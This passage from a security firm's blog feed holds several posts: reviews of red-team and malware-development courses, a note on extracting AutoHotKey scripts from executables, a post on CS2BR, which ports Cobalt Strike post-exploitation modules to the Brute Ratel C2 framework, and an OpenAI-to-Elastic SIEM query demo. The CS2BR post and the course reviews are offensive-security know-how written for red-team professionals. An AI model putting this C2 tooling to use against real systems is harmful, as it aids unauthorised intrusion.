Since Microsoft has upped their security game quite a bit, Attack Surface Reduction should not be missed, and it is included in this course with examples of how to bypass a subset of the default rules.

If you have struggled with Applocker in the past, welcome to the game. The bigger brother “Windows Defender Application Control (WDAC)” is waiting for you and allows the blue team to even better protect the environment.

The cherry on top of the course is the chapter treating different types of EDR hooks, syscalls and how to integrate goodies into the artifact kit.

Who should take this course?

If you already have completed the Red Team Ops 1 course this is a great addition to extend the knowledge gathered in the first round. In more mature environments you will face WDAC, EDRs from different providers and better blue team responses. Similar to the first course the price is very attractive and the hands-on experience in a lab and not just on paper is worth every dime.

If you think you already cover the first course with your knowledge, you can also jump to this one directly. The exam can cover parts of the first course to allow reconnaissance and privilege escalation/lateral movement, so I would not recommend going for CRTO2 without prior red teaming knowledge.

Associated costs

399 GBP = 453,86 EUR = 495,07 USD (as of 04/04/2023)

The price includes the course materials as well as a voucher for the first exam attempt.

The RTO II lab is sold as a subscription to those who have purchased the course.

The price is 15 GBP per month for 40 hours of runtime.

Certified Red Team Professional (CRTP)

The Certified Red Team Professional (CRTP) course provides you with a hands-on lab environment with multiple domains and forests to understand and practice cross trust attacks. This allows you to learn and understand the core concepts of well-known Windows and Active Directory attacks which are being used by threat actors around the globe.

Windows tools like PowerShell and other off-the-shelf features are used for the attacks, so you can try scripts, tools and new attacks in a fully functional AD environment.

At the time of this blog post, the lab makes use of Microsoft Windows Server 2022 and SQL Server 2017 machines.

Lab environment: AD Attacks Lab (CRTP)

Who should take this course?

If you are new to topics like Active Directory enumeration, mapping trusts between different domains, escalating privileges via domain attacks, or Kerberos-based attacks like golden and silver tickets, this course is a good bet.

Additionally, the SQL server trusts and defenses as well as bypasses of defenses are covered.

Associated costs

The price depends on the practice lab access time that is bought:

30 Days – LAB ACCESS PERIOD – 249 USD ~ 227,58 EUR (as of 05/04/2023)

60 Days – LAB ACCESS PERIOD – 379 USD ~ 346,40 EUR (as of 05/04/2023)

90 Days – LAB ACCESS PERIOD – 499 USD ~ 456,08 EUR (as of 05/04/2023)

The course mentions the following content:

23 Learning Objectives, 59 Tasks, >120 Hours of Torture

Please keep in mind that the certificate expires after three years and then needs to be renewed.

Certified Red Team Expert (CRTE)

After completing the Certified Red Team Professional (CRTP), you might be looking to explore more Microsoft features that can be implemented in customer environments. This course will allow you to play with the Local Administrator Password Solution (LAPS), Group managed service accounts (gMSA) and the Active Directory Certificate Service (AD CS).

As customers often have resources in the cloud as well, Azure AD Integration (Hybrid Identity) and its attack paths are presented in this course too.

You will learn to understand implemented defenses and how to bypass them, for example: Just Enough Administration (JEA), Privileged Access Workstations (PAWs), Local Administrator Password Solution (LAPS), Selective Authentication, Deception, App Allowlisting, Microsoft Defender for Identity and more.

Lab environment: Windows Red Team Lab (CRTE)

Who should take this course?

If you feel ready to dive into the more advanced defense mechanisms mentioned above, this course will certainly help you to identify these in an environment and navigate in a more mature environment covertly.

Associated costs

The price depends on the practice lab access time that is bought:

30 Days – LAB ACCESS PERIOD – 299 USD ~ 273,28 EUR (as of 05/04/2023)

60 Days – LAB ACCESS PERIOD – 499 USD ~ 456,08 EUR (as of 05/04/2023)

90 Days – LAB ACCESS PERIOD – 699 USD ~ 638,87 EUR (as of 05/04/2023)

The course mentions the following content:

28 Learning Objectives, 62 Tasks, >300 Hours of Torture

Please keep in mind that the certificate expires after three years and then needs to be renewed.

Certified Red Team Master (CRTM)

The goal of this course is to compromise multiple forests with a minimal footprint, while gaining full control over the starting/home forest.

As consulting is more than just attacking infrastructure, the course also includes the submission of a report that contains details of attacks on target forests and details of security controls/best practices implemented on the starting/home forest.

Lab environment: Global Central Bank (CRTM)

Who should take this course?

I would suggest this course if you want to put your technical knowledge to the test while also taking a step behind the lines of a blue team, as you need to document details of the security controls in place and how they could be mitigated best. This will help you to grow in the long term and make it possible to think like a defender in order to improve your evasion techniques.

Associated costs

The price depends on the practice lab access time that is bought:

30 Days – LAB ACCESS PERIOD – 399 USD ~ 364,68 EUR (as of 05/04/2023)

60 Days – LAB ACCESS PERIOD – 599 USD ~ 547,47 EUR (as of 05/04/2023)

90 Days – LAB ACCESS PERIOD – 749 USD ~ 684,57 EUR (as of 05/04/2023)

The course mentions the following content:

46 Challenges and >450 Hours of Torture

Please keep in mind that the certificate expires after three years and then needs to be renewed.

Certified Az Red Team Professional (CARTP)

Azure Active Directory is nowadays often used as an Identity and Access Management platform in a hybrid cloud model. It also allows on-prem Active Directory applications and infrastructure to be connected to Azure AD. This brings some very interesting opportunities to the table, but with them also risks.

When talking about red teaming and penetration testing, these risks can be mapped onto the following phases: Discovery, Initial Access, Enumeration, Privilege Escalation, Lateral Movement, Persistence and Data Exfiltration. All of these phases are covered in the course. The most value for customers results not just from identifying and abusing vulnerabilities in the environment, but also from making clear suggestions for mitigations that can be implemented in the customer environment in the short or long term.

Lab environment: Attacking & Defending Azure AD Lab (CARTP)

Who should take this course?

If you are a security professional trying to strengthen your skills in Azure cloud security, Azure Penetration testing or Red teaming in Azure environments, this is the right course for you!

Associated costs

The price depends on the practice lab access time that is bought:

30 Days – LAB ACCESS PERIOD – 449 USD ~ 410,38 EUR (as of 05/04/2023)

60 Days – LAB ACCESS PERIOD – 649 USD ~ 593,17 EUR (as of 05/04/2023)

90 Days – LAB ACCESS PERIOD – 849 USD ~ 775,97 EUR (as of 05/04/2023)

The course mentions the following content:

26 Learning Objectives, 77 tasks, 7 Live Azure Tenants, >140 hours of fun!

Please keep in mind that the certificate expires after three years and then needs to be renewed.


Malware on Steroids

The course is dedicated to building your own C2 infrastructure and payloads. It starts with an introduction to Windows internals, followed by a full hands-on experience of building your own Command & Control architecture with different types of initial access payloads and their lifecycle: initial access, in-memory evasions and different types of payload injection, including but not limited to reflective DLLs, shellcode injection, COFF injection and more.

The course is offered in a time span of 4 days with 6-7 hours per day in an online interactive environment.

Lab environment: Dark Vortex

Who should take this training?

If you have always wanted to write your own C2 and create droppers and stagers in x64 assembly and C, this course is perfect for you. Please keep in mind that fundamental knowledge of programming in C/C++/Python3 and familiarity with programming concepts such as pointers, references, addresses, data structures, threads and processes is listed as a requirement.

Associated costs

2,500 USD ~ 2281,95 EUR (as of 05/05/2023)

The price includes a certificate of completion, all the training materials including course PDFs/slides, content materials, source code for payloads and a python3 C2 built during the training program.

SEC565: Red Team Operations and Adversary Emulation

The SEC565 is one of the courses where you not only improve your technical ability to abuse vulnerabilities, but also your skills around the whole engagement, from planning to making sure the work you deliver is of high quality and of maximum benefit to the customer.

The focus of the course is learning how to plan and execute end-to-end Red Team engagements that leverage adversary emulation. This includes the skills to organize a Red Team, consume threat intelligence to map against adversary tactics, techniques, and procedures (TTPs), emulate those TTPs, report and analyze the results of the Red Team engagement, and ultimately improve the overall security posture of the organization.

The in-person course is 6 days long for a reason. It covers planning the emulation, building the infrastructure, initial access and persistence, as well as Active Directory attacks and ways to move from one compromised host to another. Since documenting the abused vulnerabilities and obtaining the requested objectives is very important for a red team, reporting has a dedicated time slot as well.

The last block contains a capture-the-flag red team lab consisting of 3 domains, including Windows servers, workstations and databases as well as the Active Directory infrastructure, to test the skills you learned earlier.

Who should take this course?

Defensive security professionals to better understand how Red Team engagements can improve their ability to defend by better understanding offensive methodologies, tools, tactics, techniques, and procedures.

Offensive security professionals looking to improve their craft and also improve their methodology around the technical part of the engagement (adversary emulation plan, safe sensitive data exfiltration, planning for retesting and more).

Associated costs

The course is being offered On-Demand (Online) and In Person.

The On Demand course is 8,275 USD ~ 7534.24 EUR (as of 02/05/2023)

The In Person course is priced at 7,695 EUR + OnDemand Bundle (785 EUR) = 8,480€ (as of 02/05/2023)

SEC699: Purple Team Tactics – Adversary Emulation for Breach Prevention & Detection

The SEC699 is one of the more unique courses where you get detailed insights into both red & blue team.

The course contents have been created by both blue teamers and red teamers and that is reflected in the detail of the course material.

The focus of the course is to learn how to emulate threat actors in a realistic enterprise environment and how to detect those actions.

As proper purple teaming needs to follow a proper process with suitable tooling and planning, the course makes sure that these important parts are not missing. In-depth techniques such as Kerberos delegation attacks, Attack Surface Reduction / AppLocker bypasses, AMSI, process injection, COM object hijacking and many more are executed during the course, and to grow on the challenge you will build SIGMA rules to detect these techniques.

Who should take this course?

Defensive security professionals looking to gain insights into the actual operation of carrying out attacks, to understand the perspective of an attacker: Which tools are being used? What does a C2 setup look like? How does an attacker communicate with the C2 infrastructure? How can I use automation to my advantage?

Offensive security professionals looking to gain insights into logging & monitoring: which footprint and events are generated when using specific techniques, and how operational security can be improved to stay stealthier.

Associated costs

The course is being offered On-Demand (Online) and In Person.

The On Demand course is 7,785 USD ~ 7148.73 EUR (as of 04/04/2023)

The In Person course is priced at 7,170 EUR + OnDemand Bundle (785 EUR) = 7,955€ (as of 04/04/2023)

RED TEAM Operator: Malware Development Essentials

Malware, similar to software you use every day, has to be developed, and this course guides you through it.

Starting with what malware development is and how PE files are structured, it helps you understand how to encode and encrypt your payloads as well as how to store them inside a PE file.

Remote process injection, as well as using an existing binary as a backdoor, is also explained with hands-on code examples to follow and customize.

Who should take this training?

If you are getting started with developing your own loaders and stagers, this course is awesome to get the fundamentals right and gives you customizable source code that you can improve and build upon.

Associated costs

199 USD ~ 181,64 EUR (as of 05/04/2023)

A virtual machine with a complete environment for developing and testing your software, and a set of source code templates are included in the price.

RED TEAM Operator: Malware Development Intermediate

After the course “RED TEAM Operator: Malware Development Essentials” you might be wondering where to go next. This course uses the foundation you built to extend your tooling with more code injection techniques, and shows how to build your own custom reflective binary as well as how to hook APIs in memory to monitor or evade functions.

Sooner or later, you have to migrate between processes that have loaded your shellcode so the section on how to migrate between 32- and 64-bit processes comes to the rescue. Finally, the course guides you on how to use IPC to control your payloads.

Who should take this training?

If you completed the course “RED TEAM Operator: Malware Development Essentials” and you are ready to take your skills to the next level, this course helps you to extend the kit you built in the first course.

Associated costs

229 USD ~ 209,03 EUR (as of 05/04/2023)

A virtual machine with a complete environment for developing and testing your software, and a set of source code templates are included in the price.

RED TEAM Operator: Malware Development Advanced – Vol.1

As the name of the course suggests, after the Essentials and Intermediate courses, the Advanced course teaches you how to enumerate processes, their modules and handles in order to identify a suitable process for injection. Payloads cannot only be hidden in PE files, so the course also covers how to hide payloads in different parts of the NTFS, in the registry and in memory.

It demonstrates how any API (with any number of params) in a remote process can be called by using a custom “RPC” and how exception handlers can be abused.

You will learn how to build, parse, load and execute COFF objects in memory and much more.

Who should take this training?

After completing the Essentials and Intermediate courses of Sektor7’s malware development series, I can only recommend this training to further strengthen your knowledge of how Windows internals work and to give you ideas for how to exploit them in the future.

Associated costs

239 USD ~ 218,15 EUR (as of 05/04/2023)

A virtual machine with a complete environment for developing and testing your software, and a set of source code templates are included in the price.

Corelan “BOOTCAMP” – stack exploitation

One thing to start with: the 2021 edition of the course is based on Windows 10/11 and contains an introduction to x64 stack-based exploitation, in case you care about up-to-date material and operating systems.

Although the training is based on Windows 10/11, it starts with the fundamentals, explaining the basics of stack buffer overflows and exploit writing.

The training provides you with a solid understanding of current stack-based exploitation techniques and memory protection bypass techniques. The training provider mentions that the course material is kept updated with current techniques, previously undocumented tricks and techniques, and details about research that was performed by the training author.

A small excerpt of the training contents:

  • The x86 environment
  • Stack Buffer Overflows
  • Egg hunters
  • ASLR
  • DEP
  • Intro to x64 stack-based exploitation

Who should take this training?

If you do like challenges, this training is for you. Anyone interested in exploit development or analysis is the target audience of this training.

The training itself does not provide solutions for any of the exercises that you will work through but instead provides help either during the course or after the course (via the student-only support system).

Associated costs

The In-Person training is listed at 2,500 EUR + 525 EUR VAT.

As of 05/04/2023, this is equal to 2738,89 USD + 575,17 USD VAT.

The path I chose to walk on

I started as a penetration tester / security consultant with a lot of self-gained knowledge from home projects, ranging from Active Directory setups at home to self-built network attached storage, which helped me build a good base in debugging problems and general operating system usage.

During my security consulting path I then chose to start with the Offensive Security Certified Professional (OSCP) certification as this allowed me to understand some basic exploitation techniques and also get in contact with report writing and evidence collection.

Then there was a slight change in paths for dedicating my life to mobile security, but I always kept an eye on infrastructure security and did some projects in the mix.

After some years in the field, I knew I wanted a new challenge and decided to complete my CRTO1 certification.

I approached NVISO, and after joining and completing the first larger projects I was hungry for more and completed my CRTO2 certification.

There are so many more trainings I have on my list, so keep it coming!

Education at NVISO

ARES assembles highly skilled expert professionals. This pool consists of people having 5+ years of experience in penetration testing and red team exercises, as well as blue team experts with knowledge on threat hunting and SOC operations.

The ARES team together currently holds the following certifications:

  • CRTO1 / CRTO2
  • eCPPTv2 / eWPTXv2

Our ARES team at NVISO is dedicated to offering red team services to customers around the globe in order to identify gaps in incident response handling and to improve the security posture of the companies many of us interact with daily.

See the ARES homepage for more information.

Steffen Rogge

Steffen is a Cyber Security Consultant at NVISO, where he mostly conducts Purple & Red Team assessments with a special focus on TIBER engagements.

This enables companies to evaluate their existing defenses against emulated Advanced Persistent Threat (APT) campaigns.

The SOC Toolbox: Analyzing AutoHotKey compiled executables

One day, a long time ago, while handling my daily tasks, an alert was generated for an unknown executable that was flagged as malicious by Microsoft Cloud App Security.

When I downloaded the file through the Microsoft security center, I immediately noticed that it might be an AutoHotKey script, namely by looking at the icon, which is the AutoHotKey logo.

As with many unknown executables, I like to inspect the executable in PE Studio and look at the strings. URL patterns are a quick way to see if an executable could be exfiltrating data, provided no obfuscation was used.

In the strings section of PE Studio there were multiple mentions of AutoHotKey, which confirmed my previous suspicion that this was indeed an AutoHotKey executable. A colleague of mine mentioned this YARA rule to detect AutoHotKey executables, which could be used to identify this file.

AutoHotKey executable in PE studio

After a quick internet search I found the program Exe2Ahk, which promises to convert executables to AHK (AutoHotKey) scripts. However, this program did not work for me and I had to find another way to extract the AutoHotKey script.

Unsuccessful extraction using Exe2Ahk

Thanks to a forum post on the AutoHotKey forums, I found out that the uncompiled script is present in the RCDATA section of the executable. When inspecting the executable with 7-Zip, we notice that we can extract the script that is stored in the .rsrc\RCDATA folder. The AutoHotKey script is named >AUTOHOTKEY SCRIPT<. The file can be extracted by simply dragging and dropping it from the 7-Zip folder to any other folder on your PC.

RCDATA folder in 7Zip
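If you want to triage many samples, this check can also be scripted. Below is a rough sketch (not a substitute for the YARA rule mentioned above) that flags binaries containing the >AUTOHOTKEY SCRIPT< resource name; PE resource names are stored as UTF-16LE, so we search for that byte pattern directly instead of parsing the PE headers:

```python
# Rough triage sketch: flag executables that embed the ">AUTOHOTKEY SCRIPT<"
# resource name carried by compiled AutoHotKey scripts in their RCDATA section.
MARKER = ">AUTOHOTKEY SCRIPT<".encode("utf-16-le")

def looks_like_compiled_ahk(data: bytes) -> bool:
    """Return True if the raw file bytes contain the AutoHotKey resource name."""
    return MARKER in data

# Synthetic sample: an MZ header followed by the marker somewhere in the file.
sample = b"MZ\x90\x00" + b"\x00" * 64 + MARKER + b"\x00" * 16
print(looks_like_compiled_ahk(sample))       # True
print(looks_like_compiled_ahk(b"MZ\x90\x00"))  # False
```

A string scan like this can produce false positives on files that merely mention the marker, so treat it as a pre-filter before manual analysis.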

Another website (where I unfortunately lost the URL to) mentioned that the same can be achieved via inspecting the file with Resource Hacker. Resource Hacker parses the PE file sections and can extract embedded files from those sections.

RCDATA folder in Resource Hacker

Once the file is extracted via your preferred method, you can open it in any text editor and start your analysis. If you run into any unknown methods or parameters used in the script, or have difficulty with the syntax, the AutoHotKey documentation can probably help you out.

In this case the file was not malicious, which is why we won’t go into more detail, but we have seen cases in the past where threat actors abused this tool to create malware.

Nicholas Dhaeyer

Nicholas Dhaeyer is a Threat Hunter for NVISO. Nicholas specializes in Threat Hunting, Malware analysis & Industrial Control System (ICS) / Operational Technology (OT) Security. Nicholas has worked in the NVISO SOC solving security incidents for our MDR clients. You can reach out to Nicholas via Twitter or LinkedIn.

Introducing CS2BR pt. II – One tool to port them all


In the previous post of this series we showed why Brute Ratel C4 (BRC4) isn’t able to execute most BOFs that use the de-facto BOF API standard by Cobalt Strike (CS): BRC4 implements their own BOF API which isn’t compatible with the CS BOF API. Then we also outlined an approach to solve this issue: by injecting a custom compatibility layer that implements the CS BOF API using the BRC4 API, we can enable BRC4 to support any BOF.

CS2BR really can port a whole bunch of BOFs!

I’m proud to finally introduce you to our tool CS2BR (“Cobalt Strike to Brute Ratel [BOF]”) in this blog post. We’ll cover its concept and implementation, briefly discuss its usage, show some examples of CS2BR in use and draw our conclusions.

I. The anatomy of CS2BR

The tool is open-source and published on GitHub. It consists of three components: the compatibility layer (based on TrustedSec’s COFFLoader), a source-code patching script implemented in Python and an argument encoder script (also based on COFFLoader). Let’s take a closer look at each of those individually:

The Compatibility Layer

As outlined in the first blog post, the compatibility layer provides implementations of the CS BOF API for the original beacons and also comes with a new coffee entrypoint that is invoked by BRC4, pre-processes BOF input parameters and calls the original BOF’s go entrypoint.

For practical reasons that will become apparent further down this post, the layer is split into two files: one for the BOF API implementation (beacon_wrapper.h) and one for the entrypoint (badger_stub.c).

The BOF API implementation borrows heavily from COFFLoader and adds some bits and pieces, such as the Win32 APIs imported by default by CS (GetProcAddress, GetModuleHandle, LoadLibrary and FreeLibrary) and a global variable for the __dispatch variable used by BRC4 BOFs for output. Note that as of this writing, CS2BR doesn’t implement the complete CS BOF API and lacks functions related to process tokens and injection, as those weren’t considered worthwhile pursuing yet.

The entrypoint itself, on the other hand, was built from scratch. Since BRC4’s coffee entrypoint can only be supplied with string-based parameters (whereas CS’ go takes arbitrary bytes), this custom one optionally base64-decodes an input string and forwards it to the CS go entrypoint. To generate the base64-encoded input argument, CS2BR comes with a Python script (based on COFFLoader’s implementation) that assembles a binary blob of data to be passed to BOFs (such as integers, strings and files).

Patching source code

The compatibility layer alone only gets you so far though – it needs to be patched into a BOF somehow. That’s where the patcher comes in. It’s a Python script that injects the compatibility layer’s source code into any BOF’s source code. Its approach to this is simple and only consists of two steps:

  1. Identify original CS BOF API header files (default beacon.h) and replace their contents with CS2BR’s compatibility layer implementation beacon_wrapper.h.
  2. Identify files containing the original CS BOF go entrypoint and append CS2BR’s custom coffee entrypoint from badger_stub.c.

When I started working on the patcher’s implementation, I wasn’t sure just how tricky these two steps would be to implement: Would I need to come up with tons of RegExes to identify CS BOF API imports? Would I maybe need to parse the actual source code using the actual C grammar to find go entrypoints? Or would I need to compile individual object files and extract line-number information from their metadata?

Luckily, I didn’t have to deal with most of the above. The CS BOF API imports are consistently included as a separate header file called beacon.h, thus they can be found by name in most cases. To find the entrypoint, I wrote a single RegEx: \s+(go)\s*\(([^,]+?),([^\)]+?)\)\s*\{. Let’s briefly break it down using Cyril’s Regex Tester:

The regex used to identify the CS entrypoint in source code

The pattern matches:

  • “go” (optionally surrounded by whitespaces),
  • an open parenthesis denoting the start of the parameter list,
  • the first char* argument (which is any character but “,”),
  • the comma separating both arguments,
  • the second int argument (matching any character but the closing parenthesis),
  • the closed parenthesis denoting the end of the parameter list and
  • an open curly bracket denoting the start of the function definition.

This pattern allows CS2BR to identify the entrypoint, optionally rename it and reuse the exact parameter names and types. Once it identified the go entrypoint in a file, it simply appends the contents of badger_stub.c to the file. This stub contains forward-declarations of base64-decoding functions used in the custom coffee entrypoint, the new entrypoint itself, and the accompanying definitions of the base64-decoding functions. And that’s it – BOFs patched this way can now be recompiled and are ready to use in BRC4. If a BOF takes input from CNA scripts, one might need to use the argument encoder.
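As a quick illustration, the pattern can be exercised with Python’s re module (the BOF source snippet below is illustrative, not taken from a real BOF):

```python
import re

# The entrypoint pattern quoted above: function name "go", two parameters,
# followed by the opening brace of the function body.
ENTRY_RE = re.compile(r"\s+(go)\s*\(([^,]+?),([^\)]+?)\)\s*\{")

# Illustrative BOF source; the real patcher operates on source files on disk.
src = 'void go(char* args, int len) {\n    BeaconPrintf(0, "hi");\n}\n'

m = ENTRY_RE.search(src)
print(m.group(1))          # go
print(m.group(2).strip())  # char* args
print(m.group(3).strip())  # int len
```

Because the parameter names and types are captured as groups, the patcher can reuse them verbatim when appending the new entrypoint.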

Encoding BOF Arguments

CS BOFs can be supplied with arbitrary binary data; the first blog post showed that BRC4 BOFs can’t, since their entrypoints are designed and invoked differently. To remedy this, CS2BR borrows a utility from COFFLoader and comes with a Python script that allows operators to encode input parameters for their BOFs in a way that can be passed via BRC4 into CS2BR’s custom coffee entrypoint:

CS2BR's argument encoder

One drawback of using base64-encoding is the considerable overhead: base64 encodes 3 bytes of input into 4 bytes of ASCII, resulting in 33% overhead. As can be seen in the above screenshot, the raw data of about 6kB is encoded into about 8kB. The script also implements GZIP compression of input data, reducing the raw buffer to about 2.5kB and base64 data to about 3.5kB. As of this writing, however, CS2BR’s entrypoint doesn’t support decompression yet.
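The overhead figures are easy to verify. A quick sketch (the repetitive test data here compresses far better than real argument buffers would, so treat the compression gain as illustrative):

```python
import base64
import gzip

raw = bytes(range(256)) * 24             # ~6 kB of raw argument data
b64 = base64.b64encode(raw)
print(len(raw), len(b64))                # 6144 8192 -> the 33% base64 overhead

# GZIP first, then base64: the encoded payload shrinks considerably.
packed = base64.b64encode(gzip.compress(raw))
print(len(packed) < len(b64))            # True
```

This is why compressing before base64-encoding pays off: the 4/3 expansion then applies to the much smaller compressed buffer.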

II. Using CS2BR

Using CS2BR is pretty straight-forward. You’ll need to patch & compile your BOFs only once and can then execute them via BRC4. If your BOFs accept input arguments, you’ll need to generate them via CS2BR’s argument encoder. Let’s have a look at the complete workflow.

1. Setup, Patching & Compilation

Again, we’ll use CS-Situational-Awareness (SA) as an example. First, clone SA and CS2BR:

git clone
git clone

Then, invoke the patcher from the cs2br-bof repo and specify the “CS-Situational-Awareness-BOF” directory you just cloned as the source directory (--src) to patch:

CS2BR's source code patcher

Finally, compile the BOFs as you would usually do:

cd CS-Situational-Awareness-BOF

That’s it, simple BOFs (such as whoami, uptime, …) that don’t require any input arguments can be executed directly through BRC4 now:

Executing a simple patched BOF without arguments

2. Encoding Arguments

In order to supply BOFs compiled with CS2BR with input arguments, we’ll use the encode_args script.

Let’s use nslookup as an exemplary BOF for this workflow. It expects up to three input parameters, lookup value, lookup server and type, as defined in CS-Situational-Awareness’ aggressor script:

alias nslookup {
	$lookup = $2;
	$server = iff(-istrue $3, $3, "");
	$type = iff(-istrue $4, # ...
	$args = bof_pack($1, "zzs", $lookup, $server, $type);
	beacon_inline_execute($1, readbof($1, "nslookup", "Attempting to resolve $lookup", "T1018"), "go", $args);
}

The bof_pack call above assembles these variables into a binary blob according to the format “zzs” ($lookup and $server as null-terminated strings with their length prepended and $type as a 2-byte integer). This binary blob is disassembled by the BOF using the BeaconData* APIs.
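To illustrate the layout, here is a minimal Python sketch (not the actual encode_args script) that packs a “zzs” argument buffer the same way and base64-encodes it: “z” becomes a 4-byte little-endian length prefix followed by the null-terminated string, and “s” becomes a 2-byte little-endian short:

```python
import base64
import struct

def pack_args(fmt: str, args) -> str:
    """Pack values like bof_pack("zzs", ...) and base64-encode the blob."""
    buf = b""
    for spec, val in zip(fmt, args):
        if spec == "z":    # length-prefixed, null-terminated string
            data = val.encode() + b"\x00"
            buf += struct.pack("<I", len(data)) + data
        elif spec == "s":  # 2-byte short
            buf += struct.pack("<H", val)
        else:
            raise ValueError(f"unsupported format specifier: {spec}")
    return base64.b64encode(buf).decode()

print(pack_args("zzs", ["blog.nviso.eu", "8.8.8.8", 1]))
# DgAAAGJsb2cubnZpc28uZXUACAAAADguOC44LjgAAQA=
```

Running it with these values reproduces exactly the argument buffer used in this example.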

BRC4 doesn’t support aggressor scripts, though, so CS2BR’s argument encoder serves as a workaround. As an example, let’s encode blog.nviso.eu for $lookup, 8.8.8.8 for $server and 1 for $type (to query A records, ref. MS documentation):

Encoding arguments for the nslookup BOF

The resulting base64 encoded argument buffer, DgAAAGJsb2cubnZpc28uZXUACAAAADguOC44LjgAAQA=, can then be passed to BRC4’s coffexec command and will be processed by CS2BR’s custom entrypoint and forwarded to the original BOF’s logic:

Running a patched BOF with generated input arguments

III. Where to go from here

Working on CS2BR has been a lot of fun and, frankly, also quite frustrating at times. After all, BRC4 isn’t an easy target system to develop for due to its black-box nature. This project has come a fairly long way nonetheless!


This blog post showed how CS2BR works and how it can be used. At this point, the tool allows you to run all your favorite open-source CS BOFs via BRC4. So in case you are used to a BOF-heavy workflow in CS and intend to switch to BRC4, you now have the tools to keep using the same BOFs.

Using CS2BR is straight-forward and doesn’t require special skills or knowledge for the most part. There are some caveats to it that should be considered before using it “in production” though:

  • Source code: CS2BR works only on a source code level. If you want to patch a BOF that you don’t have the source code for, this tool won’t be of much use to you.
  • API completeness: CS2BR does not (yet) support all of CS’s BOF C API: namely, the Internal APIs are populated with stubs only and won’t do anything. This mainly concerns BOFs utilizing CS’ user impersonation and process injection BOF API capabilities.
  • Usability: While CS2BR allows you to pass parameters to BOFs, you’ll still have to work out the number and types of parameters yourself by dissecting your BOF’s CNA. You’ll only need to figure this out once, but it’s a certain investment nonetheless.
  • Binary overhead: Patching the compatibility layer into source code results in more code getting generated, thus increasing the size of the compiled BOF. Also note that the compatibility layer code can get signatured in the future and thus become an IOC.

I’m convinced that most of those points don’t constitute actual practical problems, but rather academic challenges to tackle in the future. Overall, I think the benefit of being able to run CS BOFs in BRC4 outweighs CS2BR’s drawbacks.


While I’m happy with the current implementation, I’m convinced it can be improved upon. Expect a third, final blog post about the next iteration of CS2BR. What is it going to be about, I hear you ask? Well, let me use a meme to tease you:

Teasing the next and final (?) blog post about CS2BR
That's me!

Moritz Thomas

Moritz is a senior IT security consultant and red teamer at NVISO.
When he isn’t infiltrating networks or exfiltrating data, he is usually knees deep in research and development, working on new techniques and tools in red teaming.

Transforming search sentences to query Elastic SIEM with OpenAI API

(In this blog post, we will demonstrate a Proof-of-Concept on how to use an OpenAI Large Language Model to craft Elastic SIEM queries in an automated way. Be mindful of issues with accuracy and privacy before trying to replicate this Proof-of-Concept. More info in our discussion at the bottom of this article.)

The primary task of a security analyst or threat hunter is to ask the right questions and then translate them into SIEM query languages, like SPL for Splunk, KQL for Sentinel, and DSL for Elastic. These questions are designed to provide answers about what actually happened. For example: “Identify failed login attempts, Search for a specific user’s login activities, Identify suspicious process creation, Monitor changes to registry keys, Detect user account lockouts, etc.”

The answers to these questions will likely lead to even more questions. Analysts will keep interrogating the SIEM until they get a clear answer. This allows them to piece together a timeline of all the activities and explain whether it is a false positive or an actual incident. To do this, the analysts need to know a bunch of things. First, they need to be familiar with several types of attacks. Next, they need to understand the infrastructure (cloud systems, on-premises, applications, etc.). And on top of all that, they must learn how to use these SIEM tools effectively.

Is GPT-3 capable of generating Elasticsearch DSL queries?
In this blog post, we will explore how a powerful language model by OpenAI can automate the last step and bridge the gap between human language questions and SIEM query language.

We will be presenting a brief demo of a custom chat web app that allows users to query Windows event logs using natural language and obtain results for incident handling. In our example, we used the text-davinci-003 model from OpenAI and Elastic as a SIEM. We built the custom chat app using vanilla JS for the client and NodeJS for the backend.

In our design, we send the analyst’s question to OpenAI using their API within a custom prompt. Subsequently, the resulting Elastic query is sent to the Elastic SIEM using its API. Lastly, the result from Elastic is returned to the user.

chat app openai api with elastic siem
Web app diagram

A: User asking in the chat
B: The web app sends the user’s input, enhanced with a standard prompt phrase, to guide the model towards generating more relevant and coherent responses.
C: It gets back the response: the corresponding Elasticsearch query
D: The web app sends the query to Elasticsearch, after some checks
E: Elasticsearch sends the result back to the web app
F: The results are presented to the user in table format


In this demo, we focused on querying a specific log source, namely the “winlogbeat” index. However, it is indeed possible to expand the scope of the query by incorporating a broader index pattern that includes a wider range of log sources, such as “Beats-*” (if we are utilizing Beats as log collectors). Another approach would be to perform a search across all available sources, assuming the Elastic Common Schema (ECS) is implemented within Elasticsearch. For instance, if we have different log types, such as Windows event logs, Checkpoint logs, etc., and we want to retrieve these logs for a specific host name, we can utilize the “host.name” key in each log source (index). By specifying the desired host name, we can filter the logs and retrieve the relevant information from the respective log sources.

ecs example
Working with ECS
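As an illustration, a cross-index search on the ECS host.name field could be built like this (a sketch of the request body only; the index pattern and host name are examples, not values from our environment):

```python
# Sketch: build an Elasticsearch DSL request body that filters any
# ECS-compliant index on the "host.name" field.
def build_host_query(host: str) -> dict:
    return {
        "query": {
            "bool": {
                "filter": [
                    {"term": {"host.name": host}}  # exact match on the ECS field
                ]
            }
        }
    }

query = build_host_query("workstation-01")
print(query["query"]["bool"]["filter"][0]["term"]["host.name"])  # workstation-01
# This body would then be sent to a broad index pattern,
# e.g. POST /beats-*/_search, via the Elasticsearch API.
```

Because every ECS-compliant source populates the same field names, the same body works unchanged across Windows event logs, Checkpoint logs and any other onboarded source.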

Deep dive
Below, we will go into detail on how we built the application.
To create this web app, the first thing we need is an API key from OpenAI. This key will give us access to the GPT-3 models and their functionality.

create openai api key
Creating OpenAI API key

Next, we will utilize the OpenAI playground to experiment and interact with the text-davinci-003 model. In this particular example, we made an effort to craft an optimal prompt that would yield the most desirable responses. Fortunately, the text-davinci-003 model proved to be the ideal choice, providing us with excellent results. The OpenAI API also allows you to control the behavior of the language model by adjusting certain parameters:

  • Temperature: The temperature parameter controls the randomness of the model’s output. A higher temperature, like 0.8, makes the output more creative and random, while a lower temperature, like 0.1, makes it more focused and deterministic.
  • Max Tokens: The max tokens parameter allows you to limit the length of the model’s response. You can set a specific number of tokens to restrict the length of the generated text. Be aware that setting an extremely low value may result in the response being cut off and not making sense to the user.
  • Frequency Penalty: The frequency penalty parameter allows you to control the repetitiveness of the model’s responses. By increasing the frequency penalty (e.g., setting it to a value higher than 0), you can discourage the model from repeating the same phrases or words in its output.
  • Top P (Top Probability): The top_p parameter, also known as nucleus sampling or top probability, sets a threshold for the cumulative probability distribution of the model’s next-word predictions. Instead of sampling from the entire probability distribution, the model only considers the most probable tokens whose cumulative probability exceeds the top_p value. This helps to narrow down the possibilities and generate more focused and coherent responses.
